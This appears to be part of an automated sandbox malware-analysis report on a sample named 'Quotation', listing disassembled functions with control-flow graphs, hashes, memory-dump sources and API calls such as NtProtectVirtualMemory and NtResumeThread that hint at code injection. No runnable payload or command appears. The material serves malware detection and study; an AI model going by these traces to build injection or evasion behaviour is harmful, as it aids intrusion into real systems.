                                          control_flow_graph 35 5866caf-5866d43 40 5866251-5866257 35->40 41 5866d49-5866d51 35->41 42 5866260-5866261 40->42 43 5866259 40->43 41->40 44 5866263-5866276 42->44 43->44 45 5866443-5866468 43->45 46 586658f-58665db 43->46 44->40 45->40 50 586646e-5866474 45->50 51 58665e6-58665fd call 5867860 46->51 50->40 52 5866603-5866622 51->52 52->40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $0+#:
                                          • API String ID: 0-1052365346
                                          • Opcode ID: 37e6fbf8978fe699e0eba775796abf1374a8845e24dec17f22dcc71f225dc2bb
                                          • Instruction ID: 08763f1c9d47f9db1e9ab61bade3d64633d236c725290b8069f022e579ffdc4d
                                          • Opcode Fuzzy Hash: 37e6fbf8978fe699e0eba775796abf1374a8845e24dec17f22dcc71f225dc2bb
                                          • Instruction Fuzzy Hash: A0414F30A00215CFD764DF29D999BE977F2AB9A304F1081A9D80AEF3A4EB709D40CF44
                                          Function 058417B0 Relevance: 2.3, Strings: 1, Instructions: 1097COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4
                                          • API String ID: 0-4088798008
                                          • Opcode ID: dc4dd796d484e25af05a47f9ccd7981eaa34fbffebb10b42d84accb5a0b73031
                                          • Instruction ID: 865c8143bee46c34590c0aff569b7722f3d92cda56aac6559dea0505ee13f913
                                          • Opcode Fuzzy Hash: dc4dd796d484e25af05a47f9ccd7981eaa34fbffebb10b42d84accb5a0b73031
                                          • Instruction Fuzzy Hash: 89B2C334A04218CFDB14DFA4C998BADB7B6BB48704F158599E906EB3A5DB70EC81CF50
                                          Function 05869F20 Relevance: 1.8, Strings: 1, Instructions: 542COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 397 5869f20-5869f41 398 5869f43 397->398 399 5869f48-5869fe0 call 586a850 397->399 398->399 403 5869fe6-586a01d 399->403 405 586a01f-586a02a 403->405 406 586a02c 403->406 407 586a036-586a108 405->407 406->407 416 586a11a-586a145 407->416 417 586a10a-586a110 407->417 418 586a7b5-586a7d1 416->418 417->416 419 586a7d7-586a7f2 418->419 420 586a14a-586a273 418->420 429 586a285-586a3d7 420->429 430 586a275-586a27b 420->430 438 586a430-586a437 429->438 439 586a3d9-586a3dd 429->439 430->429 440 586a5e2-586a5fe 438->440 441 586a3e5-586a42b 439->441 442 586a3df-586a3e0 439->442 443 586a604-586a628 440->443 444 586a43c-586a52a 440->444 445 586a672-586a6c1 441->445 442->445 451 586a66f-586a670 443->451 452 586a62a-586a66c 443->452 469 586a530-586a5db 444->469 470 586a5de-586a5df 444->470 459 586a6d3-586a71e 445->459 460 586a6c3-586a6c9 445->460 451->445 452->451 462 586a797-586a7b2 459->462 463 586a720-586a796 459->463 460->459 462->418 463->462 469->470 470->440
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8
                                          • API String ID: 0-4194326291
                                          • Opcode ID: f2eebd7815e096b392aa485c441040e18f570d8e29bbc10851f5047e54869cad
                                          • Instruction ID: 1f66544d191198571890e6b9c391610a9bfd9a628ce4df7741cccb7c1b90e316
                                          • Opcode Fuzzy Hash: f2eebd7815e096b392aa485c441040e18f570d8e29bbc10851f5047e54869cad
                                          • Instruction Fuzzy Hash: B742B371D01629CBDB68DF69CC50AD9B7B2BF89310F1486EAD40DA7251EB30AE85CF40
                                          Function 05841AD7 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4
                                          • API String ID: 0-4088798008
                                          • Opcode ID: 2d915aa786cbda45c207465ed7a4c7bac09f1565f0c4d429f2d40e9faa0b6cfc
                                          • Instruction ID: 23b2308b6ea7af915a16558f47652c140b9e322484fb9003a673bfca7b79754f
                                          • Opcode Fuzzy Hash: 2d915aa786cbda45c207465ed7a4c7bac09f1565f0c4d429f2d40e9faa0b6cfc
                                          • Instruction Fuzzy Hash: FC22DB34A04219CFDB24DF54C994BADB7B6BF48304F1581A9E90AEB2A5DB70ED81CF50
                                          Function 0586CCA9 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 887 586cca9-586cd75 NtProtectVirtualMemory 891 586cd77-586cd7d 887->891 892 586cd7e-586cdc8 887->892 891->892
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0586CD65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 51bba25db54db987da2654cb726bd35ee69c60bba9e5338204703f3c1f3f1ef6
                                          • Instruction ID: 298b5e7b916e80a291d3ecad0b9808b1a0d86fa7b67aa2f6b444ccaa0a2a4377
                                          • Opcode Fuzzy Hash: 51bba25db54db987da2654cb726bd35ee69c60bba9e5338204703f3c1f3f1ef6
                                          • Instruction Fuzzy Hash: ED4177B5D04258DFCF10CFAAD981AEEFBB5BB49310F10902AE915B7210D735A905CF68
                                          Function 0586CCB0 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 897 586ccb0-586cd75 NtProtectVirtualMemory 900 586cd77-586cd7d 897->900 901 586cd7e-586cdc8 897->901 900->901
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0586CD65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 87d3fb7d5abfc2860e90844d29f1f7648f645fd5309847cd2ee2b49093158395
                                          • Instruction ID: abcea7233d9ff36a01d60b2ddcb10fae0e7b9e6c93e430a1c0df3290e44e5f85
                                          • Opcode Fuzzy Hash: 87d3fb7d5abfc2860e90844d29f1f7648f645fd5309847cd2ee2b49093158395
                                          • Instruction Fuzzy Hash: F54186B5D00258DFCF10CFAAD981AEEFBB1BB49310F10902AE915B7210D735A905CF68
                                          Function 0586E198 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0586E22E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: df2d2ea1d709109e5200337a3db118c159a1b4e8b356b13902a2dc02b0eb66d0
                                          • Instruction ID: ded3e1e1ffefce6e1ceecebfe97b78a918393221f826e20d8e0f7d2b570d1b63
                                          • Opcode Fuzzy Hash: df2d2ea1d709109e5200337a3db118c159a1b4e8b356b13902a2dc02b0eb66d0
                                          • Instruction Fuzzy Hash: 0F31A8B5D01218DFDF10CFAAD981A9EFBF5BB49310F20942AE915B7300C735A9058FA4
                                          Function 0586E1A0 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0586E22E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 2bc148ec25512530362040b612d4dbdaa13e674409fbac46512051c1a285477b
                                          • Instruction ID: 352af18d3ef814bbb627d5ca5cc1338e33256694952cd87d2bacc81c62e930e5
                                          • Opcode Fuzzy Hash: 2bc148ec25512530362040b612d4dbdaa13e674409fbac46512051c1a285477b
                                          • Instruction Fuzzy Hash: D13196B9D01218DFDB10CFAAD980A9EFBF5BB49310F20942AE915B7300C735A9058FA4
                                          Function 05869F11 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: h
                                          • API String ID: 0-2439710439
                                          • Opcode ID: 032575db1deb9775c7333fa82e88033a02595918fea43cc59d1adfbf3b0dd31a
                                          • Instruction ID: 84c75eb15e27e2827c84fedff5e34009e81ef655796c34622a98ab41ae0968df
                                          • Opcode Fuzzy Hash: 032575db1deb9775c7333fa82e88033a02595918fea43cc59d1adfbf3b0dd31a
                                          • Instruction Fuzzy Hash: AA61A371D01629CBEB68DF6AC8407D9BBB2BF89310F14C6AAD50DA7254EB305A85CF50
                                          Function 05866278 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2567322570
                                          • Opcode ID: 04707f2ba907f48a872b7a4adc8458036f50d6bf680f2b252026c1bea788757e
                                          • Instruction ID: a0bdee6fc8f437cfc7fcea5757fae33823c5cfab5cdf19ad835d0d62a98a6856
                                          • Opcode Fuzzy Hash: 04707f2ba907f48a872b7a4adc8458036f50d6bf680f2b252026c1bea788757e
                                          • Instruction Fuzzy Hash: 8A412130A11218CFEB64DF29D999BE977F6BB99304F0081A5D809EB3A4DB749D81CF04
                                          Function 0224A9B0 Relevance: 1.0, Instructions: 983COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f22d68ad121917c5c5a72a9a4184533f231030c01dd99ebd249eca1bce31995
                                          • Instruction ID: 528ff745cb2c2021a83755d6eb5b8dce4daa21989d81cfb5643f4e91858920bc
                                          • Opcode Fuzzy Hash: 6f22d68ad121917c5c5a72a9a4184533f231030c01dd99ebd249eca1bce31995
                                          • Instruction Fuzzy Hash: EFA2B475E00628CFDB65CF69C884A99BBB2FF89304F1581E9D509AB365DB319E81CF40
                                          Function 058451F0 Relevance: .6, Instructions: 641COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 285b9fa05d64bcec873a2436dffb5e7a61a2a4fe4a6904ef8c7a63906c8effb3
                                          • Instruction ID: 2f0575c097b3b0b1a18892f53122bb7c0597f1661e7a04ee79a8599cb0f2663d
                                          • Opcode Fuzzy Hash: 285b9fa05d64bcec873a2436dffb5e7a61a2a4fe4a6904ef8c7a63906c8effb3
                                          • Instruction Fuzzy Hash: 2B420434B002098FDB14DF69C494A6EBBF2BF89711B2584A9E906DB3A5DB31EC41CF51
                                          Function 05861AF8 Relevance: .6, Instructions: 597COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d3c651198771c491989c19e76cc317fc91133d03c4768c08f34e29c0702ea59
                                          • Instruction ID: 0df66c2aa556e29295dc008a68e334073e5a1d3a2d3fdf0439393931cdfbd01a
                                          • Opcode Fuzzy Hash: 7d3c651198771c491989c19e76cc317fc91133d03c4768c08f34e29c0702ea59
                                          • Instruction Fuzzy Hash: 0F3223B4B047198FDB58DB69C494A7EFBF2BB88310F248569D95AD7381DB30AC41CB81
                                          Function 0578EFC0 Relevance: .4, Instructions: 361COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39fbefba01e066b53d421df2c7664d211713f0992ea1edbb67cb01d85f3a5163
                                          • Instruction ID: d75d01edbc569a277aabd037ae10349e24ad8baa12a05ddbd33b73627e769813
                                          • Opcode Fuzzy Hash: 39fbefba01e066b53d421df2c7664d211713f0992ea1edbb67cb01d85f3a5163
                                          • Instruction Fuzzy Hash: 7AF1E474E45218CFDB24DF69D884BADBBF6BF8A300F1091AAD40DAB255DB709985DF00
                                          Function 0578EFB1 Relevance: .4, Instructions: 352COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bff96fc54923cb4e53ccf2d73ba34537b8e21a24d7da92463339d6681e15467f
                                          • Instruction ID: c043d621c4736c4c7df4f774e8a4fd280604e55c689ecb920e1c364c65d1129a
                                          • Opcode Fuzzy Hash: bff96fc54923cb4e53ccf2d73ba34537b8e21a24d7da92463339d6681e15467f
                                          • Instruction Fuzzy Hash: 8DF1D274E45218CFDB24DF69D884BADBBF2BF8A300F1091AAD409AB255DB709D85DF01
                                          Function 0578F5EF Relevance: .3, Instructions: 320COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa9e9d7111b65c854497b02d9306e30e1ab6da8b0091aed465cec29b3e3a4a44
                                          • Instruction ID: 1d31b8d5ce1f54ad6a93c10270d8db0733ea9e50ae723ba686cae1a25e8780da
                                          • Opcode Fuzzy Hash: aa9e9d7111b65c854497b02d9306e30e1ab6da8b0091aed465cec29b3e3a4a44
                                          • Instruction Fuzzy Hash: F1E1C174E41218CFDB64EF69D984BADBBB2BF4A300F1091AAD409EB255DB709D85DF00
                                          Function 05867D80 Relevance: .3, Instructions: 277COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 008267c09216c0c32f893a5427c6cb7f64cd00d2baa4a50600f2cba4e845adc1
                                          • Instruction ID: 32c4ffc7a6570168e47286a2168646de497cade1f4482922f48edb66f7369946
                                          • Opcode Fuzzy Hash: 008267c09216c0c32f893a5427c6cb7f64cd00d2baa4a50600f2cba4e845adc1
                                          • Instruction Fuzzy Hash: 43C1D2B0D05218CFEB24CFA9C944BADBBF2BB49308F109469D819EB255D7745D85CF41
                                          Function 05867D70 Relevance: .3, Instructions: 267COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6477b8979b24e4ff23bf28411f0f921f12bbfaa9aa12d276244c1eb7f227ffbd
                                          • Instruction ID: 091ec1be541a5bf2c82637d0cc75972282eec65faab48e9b2737c7f69d9bc415
                                          • Opcode Fuzzy Hash: 6477b8979b24e4ff23bf28411f0f921f12bbfaa9aa12d276244c1eb7f227ffbd
                                          • Instruction Fuzzy Hash: BDC1C0B0D05218CFEB24CFA9D944BADBBF2BB89308F1094A9D819EB254DB745D85CF40
                                          Function 058D6567 Relevance: .3, Instructions: 261COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2bab78fb099a58b4cf5b565d4477386e6f10367038c7886b1390e31c85a5957b
                                          • Instruction ID: b6057a5577272bbc2596fae051f65c128ffd14393fc7e31469434c93cb197a67
                                          • Opcode Fuzzy Hash: 2bab78fb099a58b4cf5b565d4477386e6f10367038c7886b1390e31c85a5957b
                                          • Instruction Fuzzy Hash: 2EB10474E0520CCFDB10DFA5E484BADBBF6BB49314F2091A9D80AAB295EB715D85CF10
                                          Function 0578FA30 Relevance: .2, Instructions: 248COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b24a7c57832ae7bc3320ec245190f06a8c096f9ff8f8894324d409153712fab
                                          • Instruction ID: 98754dc585ad91aa7ba9693c4aafaf09b3e48e9c0ec84ace8159700f324b03c1
                                          • Opcode Fuzzy Hash: 2b24a7c57832ae7bc3320ec245190f06a8c096f9ff8f8894324d409153712fab
                                          • Instruction Fuzzy Hash: 21B13A70E45218CFDB14EFA9D994BADBBF2BF8A300F2090A9D509AB255DB705D85DF00
                                          Function 0578FA20 Relevance: .2, Instructions: 244COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 171ca6d21f4bfb89df33322a56dd6d1f706d1e9ac34475d8f6d33fb640aa68e2
                                          • Instruction ID: 0de118a4cb87690050c2845373aea9c8a30a139e90375895c27dbf55c8b6af6c
                                          • Opcode Fuzzy Hash: 171ca6d21f4bfb89df33322a56dd6d1f706d1e9ac34475d8f6d33fb640aa68e2
                                          • Instruction Fuzzy Hash: 06B11874E41218CFEB14DFA9D984BADBBF2BF8A300F2490A9D508AB255DB705D85DF00
                                          Function 057868A0 Relevance: .2, Instructions: 243COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9de1d9194785dc331815a46bb2c8b3943fdf9b214b47c6d1d8cba6682a8ceca7
                                          • Instruction ID: 2174d7bbd4091e287a071dd9656d59592fe1af41525e18fdbbfe6d34b87fc3b1
                                          • Opcode Fuzzy Hash: 9de1d9194785dc331815a46bb2c8b3943fdf9b214b47c6d1d8cba6682a8ceca7
                                          • Instruction Fuzzy Hash: 5BA15470E45218DFDB24DFA9D888BADBBF2FB99304F2491A9D419AB351DB305981DF00
                                          Function 05785CB9 Relevance: .2, Instructions: 162COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e95ac7739630d6732d47218260c20aebe344ea87e1204be2ad5818e3bd595e2b
                                          • Instruction ID: fdb4cd1b172d547dddfeee6dbf6a2f2a2481467936bfece726576101a11f3d9b
                                          • Opcode Fuzzy Hash: e95ac7739630d6732d47218260c20aebe344ea87e1204be2ad5818e3bd595e2b
                                          • Instruction Fuzzy Hash: 02714AB0D45219DFEB24EF99D988BBDBBF2BF46304F1080A9D409AB255DB705981EF00
                                          Function 05867092 Relevance: .1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef66c0b9888818aa647f63ead05b80f73c05d97ce550d29480d0aaf8b734549
                                          • Instruction ID: bf006b18f55c9d416627af11ec0c8ed48ed9d2e25018314b72d15779ccd5674a
                                          • Opcode Fuzzy Hash: 3ef66c0b9888818aa647f63ead05b80f73c05d97ce550d29480d0aaf8b734549
                                          • Instruction Fuzzy Hash: 44513C30A10219CFDB14EF68D999AED77F5EB9A304F1080A6D806EB3A4DB74AD45CF40
                                          Function 0586747E Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cdb19ed3eb1252859bbb6925110129a8100a13cde02643f8ec1844b20f2cbd5
                                          • Instruction ID: 5358ef28641f37234f94f112b633d92a877a6364a28e0d70fc4046cfaa8d642d
                                          • Opcode Fuzzy Hash: 3cdb19ed3eb1252859bbb6925110129a8100a13cde02643f8ec1844b20f2cbd5
                                          • Instruction Fuzzy Hash: 43413E34A01218CFE764DF29D999BE977F2BB8A304F5081AAD809EB394DB709D41CF40
                                          Function 058D4BB0 Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 101954dd1a62079c44998f6d3d87fcccb812ed88d8332e87704d7f900a37be9c
                                          • Instruction ID: 57d72f20682a80ccf8143316586c76094766022ebb0160b139463e025dfd92d0
                                          • Opcode Fuzzy Hash: 101954dd1a62079c44998f6d3d87fcccb812ed88d8332e87704d7f900a37be9c
                                          • Instruction Fuzzy Hash: 24312C71D0521C8BEB64DF69D8847EDFBF6BB89305F1080AAC819E7255DB705D858F10
                                          Function 05866DEB Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c235cfdee9f16cf874096488c7d284a173ea64641fe50444a711b5e51ecb138
                                          • Instruction ID: 5ed4ae732374f9671ad6aa3a881d224f437d4356c101c08948a51c5a1364bc90
                                          • Opcode Fuzzy Hash: 9c235cfdee9f16cf874096488c7d284a173ea64641fe50444a711b5e51ecb138
                                          • Instruction Fuzzy Hash: 88412334A01214CFE764DF29D999BE977F6EB9A304F0081A9D809EB3A4DB749D41CF44
                                          Function 058670EA Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61d9872732320cf6e17fe225e2c9076e4511c938a66c82b2506bdf3110106d35
                                          • Instruction ID: 198c59ab514d639b59d0a0afc8ef01b80432a8498764ef23cf02e5bd340f8d90
                                          • Opcode Fuzzy Hash: 61d9872732320cf6e17fe225e2c9076e4511c938a66c82b2506bdf3110106d35
                                          • Instruction Fuzzy Hash: BB414E30A10209CFD714DF69D999AAE77F2EB9A304F1081A9D805EF3A4DB70AD41CF40
                                          Function 0586735F Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 696ae9122e6ca9c682789a22b705e6bcd8f30a1aee20770f32e8b96896531966
                                          • Instruction ID: 96c3f275efddcd599a1352c870a704f480c999676bafdb6ab27ba19d53e1d6cc
                                          • Opcode Fuzzy Hash: 696ae9122e6ca9c682789a22b705e6bcd8f30a1aee20770f32e8b96896531966
                                          • Instruction Fuzzy Hash: DE413F34A00218CFE764DF69D999BAD77F5EB9A304F1081A9D80AEB394DB74AD41CF04
                                          Function 058672AB Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 370103dd3696bd8ad45016d338faedebfc1b28c47ae3aeef33e5f7f69b3e0cc3
                                          • Instruction ID: 8b77db4bad031bf5cd98b74a00bcef385e43b81d9c6760554b09466ee33c9647
                                          • Opcode Fuzzy Hash: 370103dd3696bd8ad45016d338faedebfc1b28c47ae3aeef33e5f7f69b3e0cc3
                                          • Instruction Fuzzy Hash: 6241FD34A10218CFD764DF69D999BE977F5AB99304F4081AAD80AEB3A4DB74AD40CF04
                                          Function 05866996 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
